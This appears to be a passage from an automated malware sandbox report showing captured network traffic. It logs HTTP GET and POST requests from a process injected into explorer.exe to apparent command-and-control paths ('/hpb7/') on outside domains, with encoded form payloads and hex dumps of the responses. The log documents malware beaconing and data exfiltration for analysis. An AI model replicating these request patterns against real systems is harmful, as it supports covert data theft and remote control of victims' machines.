6f 32 37 74 69 61 4d 77 70 33 62 51 44 6d 4d 41 47 68 41 48 41 41 6f 71 6f 7e 4a 44 6e 37 52 6b 74 77 34 76 43 38 58 62 42 6f 4e 41 57 62 68 49 50 46 41 4b 6c 7e 65 53 38 44 41 47 32 71 58 73 4f 31 30 7e 43 4e 63 67 66 4f 74 58 6b 62 34 45 5a 72 4e 68 61 78 70 6d 47 77 50 59 38 58 4b 7e 6c 4e 7a 51 58 67 75 78 48 77 7a 65 6f 38 2d 43 4d 74 51 67 56 71 6b 4d 58 6d 49 43 57 63 72 61 43 6e 31 53 6f 71 65 6a 52 70 50 4d 58 47 4c 6f 30 54 32 51 63 43 6e 69 48 4d 66 59 4e 30 78 42 78 4b 35 73 30 31 2d 64 5a 4b 6e 58 78 43 4e 48 5a 51 77 6c 48 6c 6d 57 44 4d 57 31 77 37 4f 72 35 4a 53 37 62 45 7a 55 6c 69 77 53 6f 6a 38 63 62 4f 45 64 65 78 74 32 32 46 34 68 54 77 62 41 48 41 4d 6a 76 74 7a 57 63 68 54 4c 49 28 41 47 71 73 34 55 59 47 74 43 70 7e 75 33 4a 28 44 38 4d 38 6a 68 49 48 75 59 6c 7a 41 76 6b 65 4a 47 52 47 49 28 6a 69 43 76 47 46 6f 42 32 46 38 67 34 43 5a 65 4a 48 61 56 34 75 49 59 4f 36 55 5a 47 52 6c 45 47 47 79 7a 72 67 63 4c 4d 59 4e 54 6d 41 37 51 30 63 4c 47 7a 4e 65 6a 34 45 4a 47 36 4d 44 65 4d 6c 2d 58 73 43 76 4c 32 57 70 4b 34 4f 77 48 5f 57 5a 69 6a 62 76 4f 48 38 47 59 45 67 41 6e 62 4c 54 39 6f 4e 6b 79 4b 71 47 4a 6e 39 62 7a 46 4b 6a 38 37 6f 50 30 51 38 4b 79 6b 6d 4c 49 4e 6f 54 51 64 65 57 69 42 56 33 6a 44 38 5a 57 50 66 57 71 46 51 64 54 38 34 77 46 4a 74 55 53 6c 4d 37 34 77 44 6d 43 45 4d 72 79 43 52 61 56 69 66 50 7a 4a 45 59 44 36 51 34 48 67 42 4f 45 45 64 4a 6b 75 56 36 41 43 4f 69 6c 63 39 36 50 4a 56 43 37 7a 6c 42 5a 6d 28 62 45 59 6d 69 38 79 32 6d 67 67 38 2d 53 32 4b 4e 30 65 32 35 71 41 28 6b 44 4d 32 55 67 32 6d 4e 53 49 56 4f 41 6e 57 5f 66 71 67 57 4a 54 6e 4d 32 6a 38 63 77 31 55 72 78 30 31 4e 57 71 6a 2d 6a 47 5a 59 4e 70 5a 36 33 52 6f 51 71 30 74 31 71 53 68 62 69 46 62 79 45 7a 79 52 59 59 31 79 45 77 50 4d 62 54 59 38 71 48 6a 6b 49 46 6d 63 62 4d 4a 75 4e 55 4c 49 48 7a 45 53 39 4a 71 53 62 6b 67 62 49 52 44 66 50 6a 61 65 34 78 44 7a 74 67 6c 6d 4b 58 6c 4c 7e 34 79 41 28 4a 4f 52 45 6c 69 65 69 67 61 64 42 48 6a 47 37 36 47 64 4a 75 4f 6a 6e 34 79 50 69 6a 76 38 66 66 4c 63 58 57 68 56 4d 41 6a 61 44 42 4a 36 65 4a 78 54 43 42 43 59 56 30 43 41 37 5a 6f 69 33 43 48 53 39 45 73 4c 33 56 28 4b 41 4e 39 77 32 50 43 61 43 36 5a 4e 61 47 4b 44 52 7a 69 71 76 7a 70 39 6c 70 5a 33 73 30 64 59 4b 32 63 59 76 4c 34 65 54 68 6b 46 4e 69 7e 51 4d 2d 6f 45 57 4a 44 2d 75 70 36 62 41 42 45 6d 76 5f 6d 5a 4a 71 4c 47 66 36 4a 49 53 39 77 6e 31 48 79 64 73 37 35 48 34 6c 4f 67 6e 68 76 68 50 71 7a 77 34 79 34 35 66 70 69 70 72 68 37 42 78 58 48 50 37 72 75 4b 51 67 6d 42 63 39 77 64 31 4d 41 6d 61 6c 38 4b 30 62 36 53 36 44 77 71 73 2d 58 54 6f 4a 62 65 7a 58 5a 37 74 45 79 73 51 62 72 2d 7a 37 30 63 54 34 74 57 45 55 6f 52 42 6f 43 34 30 73 4c 7a 45 59 33 64 31 53 53 33 7e 31 55 39 64 72 4c 6b 67 55 45 69 70 6e 6e 68 63 6b 32 34 45 36 37 5a 73 59 4b 43 47 46 4e 45 4c 47 30 48 38 49 41 32 37 44 39 7a 41 56 44 5a 62 71 37 76 4e 79 4a 79 72 46 6d 37 6b 4e 75 65 77 50 54 4f 4f 59 65 79 6e 74 74 55 72 69 28 5f 6c 5f 63 30 56 43 64 54 66 38 37 35 7e 51 6b 47 58 5a 55 34 4b 6d 31 30 38 54 4c 56 28 65 4d 79 37 77 51 6d 63 39 73 73 4a 48 6f 42 49 47 46 73
                                                          Data Ascii: bcX3Uv=Guaud9EOwHvvg7AhHae_d4H8E-smAJlWv3IamZ7t0OTMI2uK6BC3pqWYX6palwzBHZhBTYjxucN2obKjnZNpTtBq18xKhBqVJz~sXy3DijPOU5MHjlQsaAYev59M(DLkR-AzPGeEMYMkp9UOfJe8(HCL520YwdonkyDa2OP21tYX4z(oKVmtd5YYeXCmImJHL0hotmRxunwK2m9zLHpxPk5GZkiLhhbTpzXT9UbYC9KLpbduvVWKVcpEA32NXcMfTlEW8bdi4ap_79AvA4G0oSbmeJB2JjpeDLSshosyo0XOVA8n25T5Vo27tiaMwp3bQDmMAGhAHAAoqo~JDn7Rktw4vC8XbBoNAWbhIPFAKl~eS8DAG2qXsO10~CNcgfOtXkb4EZrNhaxpmGwPY8XK~lNzQXguxHwzeo8-CMtQgVqkMXmICWcraCn1SoqejRpPMXGLo0T2QcCniHMfYN0xBxK5s01-dZKnXxCNHZQwlHlmWDMW1w7Or5JS7bEzUliwSoj8cbOEdext22F4hTwbAHAMjvtzWchTLI(AGqs4UYGtCp~u3J(D8M8jhIHuYlzAvkeJGRGI(jiCvGFoB2F8g4CZeJHaV4uIYO6UZGRlEGGyzrgcLMYNTmA7Q0cLGzNej4EJG6MDeMl-XsCvL2WpK4OwH_WZijbvOH8GYEgAnbLT9oNkyKqGJn9bzFKj87oP0Q8KykmLINoTQdeWiBV3jD8ZWPfWqFQdT84wFJtUSlM74wDmCEMryCRaVifPzJEYD6Q4HgBOEEdJkuV6ACOilc96PJVC7zlBZm(bEYmi8y2mgg8-S2KN0e25qA(kDM2Ug2mNSIVOAnW_fqgWJTnM2j8cw1Urx01NWqj-jGZYNpZ63RoQq0t1qShbiFbyEzyRYY1yEwPMbTY8qHjkIFmcbMJuNULIHzES9JqSbkgbIRDfPjae4xDztglmKXlL~4yA(JORElieigadBHjG76GdJuOjn4yPijv8ffLcXWhVMAjaDBJ6eJxTCBCYV0CA7Zoi3CHS9EsL3V(KAN9w2PCaC6ZNaGKDRziqvzp9lpZ3s0dYK2cYvL4eThkFNi~QM-oEWJD-up6bABEmv_mZJqLGf6JIS9wn1Hyds75H4lOgnhvhPqzw4y45fpiprh7BxXHP7ruKQgmBc9wd1MAmal8K0b6S6Dwqs-XToJbezXZ7tEysQbr-z70cT4tWEUoRBoC40sLzEY3d1SS3~1U9drLkgUEipnnhck24E67ZsYKCGFNELG0H8IA27D9zAVDZbq7vNyJyrFm7kNuewPTOOYeynttUri(_l_c0VCdTf875~QkGXZU4Km108TLV(eMy7wQmc9ssJHoBIGFs3GSSrjtamF3qlca9jtalsdeIsAltibfX1AaDXwEf~Mx9YY9fdC6Hr1H9EkKCNtCseNnYdU1cclMRj2yEzyxyJ22sxZBZbwQCvHXE9XkhSAuzCxsIyEPfyGp4MChcFs6gT6UXe7fw0nDlvR9ud-LBCbjiCS312CBRd9WtQqrY3HoJSwcGI07d74MU5IQPkIInP-KMBZyd2Kyk9cpTTmfOoQ8q3tOq6_Mq44dpmGlIC-gWLdFV1d1zhS8cWytH2qyKFjzHhsT9THmKGWKmteGq0Tl43mirDg(qKJv-KH~M0aVmIoK2G6S-xVChHR2tDo3u6rZfxhT-iqGu5f2w0PpEkkghfu~PMkCRmLiEJdEIaR4gu-wy~UUFUUmYoKi87SSkaWFq0K3KmkkQZalJYU0vBGL69nfhyHlM4_5j6bJPwl2xLarZE5z7uItPhJhf6hLEXDu2yy5aQwd37a9K0n8pEL5lF4dQbw~6PjD4YC5SXOQJY5DVY9By29kUoa0JDwpOJj4jreQ1oNYfFIbZfVnX0VJh3upfS01hYQv3HhWwoEPAf_45NxpmgrYUliRz4bUHI2jIhZTY8PBzXy79WlVBHCC2hCl5RBcXvY(SWKGUNfcpPZDIr0ygFFhCoMDpm4FGHD3FmNcJHBnblm9_7q4odXqM~7BLzeNfzJtRp5Ss8xuYb4lekok0QgLaMHtUFsYm4E2hh8p-Ek~YLjVst_hSP0erH-J_WoxuLNjPGM(I6BaAKo53MTgPEvQTmiGEd9SBdGxPdG~T0HQuHCUI(pGIcTsJPR4IBZo5vzvPZvfu31~jZ-PirgT3XGuHvioqjKn1dAdGX10GGcOEIWlSMONMs7QYQoVtxH36DScOyVTsCHl5NweIrEMfPjcss_xqXaIt~oD-uuMWBdltc0GfgZJG7ijdXRRsYGqyQLq_Eq7a4xAqZBiIaIzXgoKcYmAJJG5k6RQTu-fAPkzObKpJ(nWzMRG12YsRZAh0(O~XcZiAZQ6YSTzazhWr7hPE76EBPAv0LuP8K-ZWr-Zsn-VVn9c_qFlHZnOgIk5PW6MJKsW5c6hJ60IXtSWqs36V1JP8aq8Jl8aW1FfTO3DGYYZKrwDTDCTNw2okQcGr4avqeSuLTIzHCjQQ5Zg7TBK4fH(fb0ONhrjDB_S_1q~eALeYxJ80tjxPBZGI9woKqMMm5NnkuD6wRbNALq6T~l55VIN9xKb5ahieRUS072T4tUUMEPlJl0TYNP7VCZi775cv5fj541b8ckw4s7lexrJPD_PcOHbEIRhfaq0bpGb18IKoclTg13ffgANZU9oHJzjuH4m9(qTAP0E54vzw5D58MycoLjiyziRwGX18ShVomIRUBLuKtLE2jYZsqNnXbWQ5cgME3mVwZfhTVWhC1j3qXgTwH-y9boka(2CtbSfeNmyKXBxNiGn9EinZ1Al5WFfRUObfvHDG(yucnuhWrz7ZXu8xlZWrEGpDHPE0y0wFEVokA7jcs2euK5uyl1hrrhKFaONa7nhAeGNDXUdV2WB2b3SGnemMHNY2xG35NicmJnNqvbGAs8igB0JJcioOZUfD1la8l5IVfh93~oUGh0nsRPEc7TfxItePrIKJqqlfg0pAKiEgDzVS1oIZtsLg5iRzo-Q87emspU7wotCNDG8vhwgoMQQUfzSghsbne9RliUV9pO9Tq0dn46KdfQvm2p30CtFEK8p4FjSszMlXnN6CRLt8SBJ3hDUbbK8Ex9obhyyCzx8wiDAKOFiT9-LHHrFia60GMf6aU7n67FLJRvL7fga2oL(T(sUu3bYo0rLt32Mnl29EySticxGwCphsJ3Li4KXL0TFzClr8H_Z4txkDMYBgEufN525nCKTtf0BnI7KME9OjOZ~8wzfVMIIjYndO8Pq3bpaCHEOm2a1UGRusfhSzKG~RVCSAF3hy98MlDyskjAgzNVLOpntWDKPfQ_jZA1lqS83ltb9oaqSOaiC8(GPoo-E8Is~dIxQLj1enzUEvAXDYZWxVAGBeT0HIwIzlR8fNCvgFW3xXDnk9RvKbVWQrVMWFwv2NtCHZB-ij6XjE6zddi-SU5I~SiXhGf4AQxMHTsnYdeOzEhUtfWm0wmj7Ey0nbWWdZkq7vv1O2NT9aYJxQVMCycu4xPsLWUrWwNMukn9hr3G9qi8AzU9mVludOlVpI7yTqGxtUKs0cTxsCPATxMI2GBQFB0cnF5QnnUUbKbikym0M0fR2531FYzOIU1hTdm5QW81z7tgDyXyJ8icm27cgVH1UqszG7YXNUVHLjEwEdheGEER(t9VAbu6dAGQ5E039dL48ffjTLUOVlUbqLaeDsofz5Sa0pYdaW4G8ye7lFZXasZxEQB6TCxemFgFGltjDVpkrzNpmD6m1LDD47zpi1R3xeE0r90LER0Ya7RLZo6HWctCPtqS~5Q3ybdoX6TAqD9F2c(TPcU3RknFc-kw~WRMUqV0~yTpvjtcam5irdLthIJL1IXUCrHCzVkCdHHAI_S7(yfwHOk9uyN-8313HS0xUrNQHxDs19ntVriJp_OuRTX5(LbLKg9PrXEgCPRiGf7qSK5laJZykPqJuM7SZ10fPJsWNPbodD23c3kVTR5TQWbSaRqxLpMnyYQOuktHEtpISDWUkktirAsQ~TfzTBEmU371k2X9aM2zaBvBn-iYr-oc8zNnblXnimXpPTLT9ZaFQ4(QpT9KHZsmSJRaZC3SlG2mAwvMg
                                                          Mar 21, 2023 08:07:50.723227024 CET362INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:07:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/7.4.33
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd c8 0d 01 fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95 44 47 b7 5f b2 fb be 3f ed d6 db 75 af 3c dc be b9 df 77 c5 06 f4 a6 ba 2b b6
                                                          Data Ascii: dd6aklI}8WW}'3o+jrggw%k'3OVe<9'obvfk$!HHe0L?M'xDx3q{GeEvWm7o;/^| |wEgp,/^UwB|<T/E_//l[W|=.MdfwXP|1+vey=B*.XTrPT]I*n/^Ux},o76(on7_?nw8fWQw@$Vw2?CwuCW#8xT x:?'>Y'URE-)L3d??6sl.jh]c''poZG\]\_y;}v(6_dG$2[=jq"#}tC^_|n`}MmrE:=*p.`Y{eyofxUj8=li}`dCzMmj{4C#3>"rc_|}\Cdnw<nWi",93MQl{bmz[6JMC98,2,c)ReGT&~DG_?u<w+
                                                          Mar 21, 2023 08:07:50.723290920 CET363INData Raw: c5 91 8c da a2 2c 77 dd 6d 7e ac 8a c3 9b fb 62 ce e6 d6 9b 35 69 95 7c 7f a3 fd ea 71 e4 8b 43 79 3c 96 87 f5 ed 7a 97 46 d7 f0 0c 84 d1 7f e7 f7 c5 b1 dc 16 13 f0 35 ef ce 0f f9 6e 79 ec 8e fb fd 9e 68 eb b7 93 ce 43 71 7b 22 1b d9 6f 3f a1 c7
                                                          Data Ascii: ,wm~b5i|qCy<zF5nyhCq{"o?r^vdVjS?"3|??U3njC//k]hsQ@Wt%eT haVMPAkut(v}ELyGf:j-
                                                          Mar 21, 2023 08:07:50.723331928 CET364INData Raw: 12 27 db f5 86 d8 b6 5d a2 c6 6d 96 8f ba 06 64 4b be bd 6a 3d a2 ba 0c c7 83 21 a0 a4 08 dd b3 fb 35 d9 ab d4 c9 5a 77 53 ac aa 47 fe e9 41 82 5c b3 0e 1e 89 2e 88 ec 4f 7e 54 1a 9f 98 06 d3 5d 57 c5 f6 d8 10 a5 d0 a1 4c fa 1c 8a 54 10 91 93 ba
                                                          Data Ascii: ']mdKj=!5ZwSGA\.O~T]WLTt\QCW|KHd{Adbg"h#sqt\Ss.Bgu~JizZW|T='du_$PVCV-7r?^.K,+U}(o,|,B
                                                          Mar 21, 2023 08:07:50.723375082 CET366INData Raw: f1 a8 bf ff 78 a3 69 32 b8 d4 dc d8 0e 39 35 fc 03 97 db d2 a4 9c 53 6a 38 4a ba cb f5 96 ef 87 0b b2 72 1d 3f ff a2 6b 1e 8c 6a 5b 23 40 94 9d 01 d3 19 50 34 21 c3 3e fc 7d d9 ef f7 71 7e 61 f8 cd 4f f4 b6 eb 9a 8c 4a 0c 6d ae ba de 03 e9 f8 a1
                                                          Data Ascii: xi295Sj8Jr?kj[#@P4!>}q~aOJmd*b!oV"mwj5dK]wsBn{jqoQ&npMZ|cu`%h 92QO|0Os-eH->V3z>P[|F*>i
                                                          Mar 21, 2023 08:07:50.723417044 CET367INData Raw: e1 00 3d 91 8a 87 f5 26 47 d4 18 7b 28 4f a7 93 52 55 fb 10 87 56 be af e1 04 f8 ac dc 29 1e 66 e3 3e 78 f9 a3 37 1e 13 44 be c4 be c5 76 5e 2c 51 97 1d 28 31 b4 fc 9f d3 ec 5c 1c e1 17 b4 d2 57 6f f9 17 fe cc 14 7d 99 e9 0d ab fc e2 2b bc 0e 43
                                                          Data Ascii: =&G{(ORUV)f>x7Dv^,Q(1\Wo}+Cak%{m)5{Q'<pb{[g8~0XG+(6}W^xsPu/wGuj?Vd%:A([&E\fe6WvGpvi<&
                                                          Mar 21, 2023 08:07:50.723462105 CET369INData Raw: 21 45 d1 c1 43 78 ec 91 11 55 10 7a 48 2f 91 ec b7 c8 79 53 74 5d 32 0c 75 a0 09 4e bd 76 04 da b4 21 24 d6 02 06 57 e8 1c fa 6b eb 2d bd f1 97 ab c7 15 8d 5b 56 a9 6d 83 f3 dc b3 c7 00 88 38 06 10 87 00 de 12 1e 91 d5 47 44 4f 63 97 22 04 07 a6
                                                          Data Ascii: !ECxUzH/ySt]2uNv!$Wk-[Vm8GDOc"`~6Ap9H;h>3KVC-=/Le+,dt k79l4 rF&TQALNd!UQ(2+8+#%|a_x$d3iHjh)k@&
                                                          Mar 21, 2023 08:07:50.723506927 CET370INData Raw: 7f ba c4 ee bb 2b 91 75 0c c2 f8 57 ca d9 60 e8 5e 86 04 06 b1 9c 27 59 91 3a 9a 15 51 f7 89 36 22 9c 61 59 6e 04 35 f0 3a b1 b5 71 17 0c e2 78 8a 44 e8 5a 6c 49 87 c0 aa 9e 84 cc 5e 87 6b 64 66 4a b2 30 36 dd 05 50 b3 1b 39 b5 2e 37 9d d3 c6 e1
                                                          Data Ascii: +uW`^'Y:Q6"aYn5:qxDZlI^kdfJ06P9.7 #;_?Xu:.7_hi`#_nW7.i3h0B'7D3*g927<7qsF5 %6>C/>^=sdryUHX
                                                          Mar 21, 2023 08:07:50.723550081 CET371INData Raw: 30 4a 50 79 c3 26 5c 85 ac 1e 9b f2 f6 f1 96 18 bc f2 42 b4 f5 1e 96 67 05 71 7a 50 73 be f7 dc 5b 6f 9f 5d d8 ef 6d 25 e2 97 33 bf 59 13 ed 15 da df 48 c3 e1 4e 3f 5a 4f ab c5 9b d7 0e da 00 4d c9 5b 05 ee e0 0c b5 ae a6 d7 db e7 6a 51 33 c9 03
                                                          Data Ascii: 0JPy&\BgqzPs[o]m%3YHN?ZOM[jQ3-vHC&b3vo@.~{_+9Vy2<M_d>ky}~:tC?4Z5&!hQ~"yDCuaz]5DG\X\U\]]L]-&#x8*^
                                                          Mar 21, 2023 08:07:50.723612070 CET373INData Raw: 62 93 e3 1b e0 e1 d0 11 0d e8 71 d3 fe 06 c4 cd e1 ae 62 a9 17 7f 27 9a d8 20 aa 47 2b e8 3b 8a 13 60 4e fb d1 23 d1 e2 f1 ac 66 7f c7 90 0f 23 cf e3 e8 67 ab 16 8b ba 21 53 3f d0 05 0d 36 aa 99 6c bd db 9f aa 9f d3 67 5a bf a0 b6 e0 ba fa 8a 6b
                                                          Data Ascii: bqb' G+;`N#f#g!S?6lgZkJwLfz~.b_wC?Z7/mn4#|Zud4=$5LGM9T-5!iumW;D%K1D#EY_Gzc~/`Q|;`06L
                                                          Mar 21, 2023 08:07:50.723655939 CET374INData Raw: 41 64 51 22 d6 0f 0d 58 97 73 1c c1 a6 0f 45 9d 73 8c 46 4c bb ba 78 b6 d6 50 08 3a 3e c6 93 d7 d6 15 49 e6 48 ed 67 dc a9 f1 dc d4 58 c1 c7 e7 6a 30 38 cb d4 7c 62 cb 4d d6 c3 66 13 d4 71 83 4d ca 0d c5 30 72 6a 37 bd 39 e4 37 f0 01 69 be 1f 83
                                                          Data Ascii: AdQ"XsEsFLxP:>IHgXj08|bMfqM0rj797iw(Weu.Zk5MFr0FONLCpWZ8W$z)oK\#q^B^KF]\SM/PW>imkM6Um&hvq,k h2nc
                                                          Mar 21, 2023 08:07:51.018047094 CET375INData Raw: 66 28 b7 42 27 ed e2 24 f3 37 0e 75 6d f8 6a d6 6e 2b 9c c2 b8 d5 2c da 36 08 95 01 ab 59 ad ad 30 72 23 f5 3c fb 95 30 44 35 eb b3 15 3e 6e 6c 6a 16 66 5b 7c d4 a0 d4 ac c8 36 08 b9 d1 a8 59 8a ad d0 a9 81 e0 d6 60 1b 5c ca 1a d3 4c b0 56 18 95
                                                          Data Ascii: f(B'$7umjn+,6Y0r#<0D5>nljf[|6Y`\LV9mP2#NZa-]/,~nSaKMh.;PF.[;1x@DS,R(+QNMP.VgLhvR7n//p2;3naqwhw0*


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.349704219.94.129.18180C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:07:52.935645103 CET456OUTGET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1
                                                          Host: www.kunimi.org
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:07:53.796298027 CET457INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:07:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Powered-By: PHP/7.4.33
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA==
                                                          Vary: Accept-Encoding


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          7192.168.2.349705162.0.231.7780C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:13.889502048 CET459OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.traindic.top
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.traindic.top
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.traindic.top/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 77 67 72 74 72 5f 31 49 32 4b 57 35 47 72 6d 6e 47 67 29 2e 00 00 00 00 00 00 00 00
                                                          Data Ascii: bcX3Uv=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oNwgrtr_1I2KW5GrmnGg).
                                                          Mar 21, 2023 08:08:14.177340984 CET461INHTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:13 GMT
                                                          Server: Apache
                                                          Content-Length: 3242
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 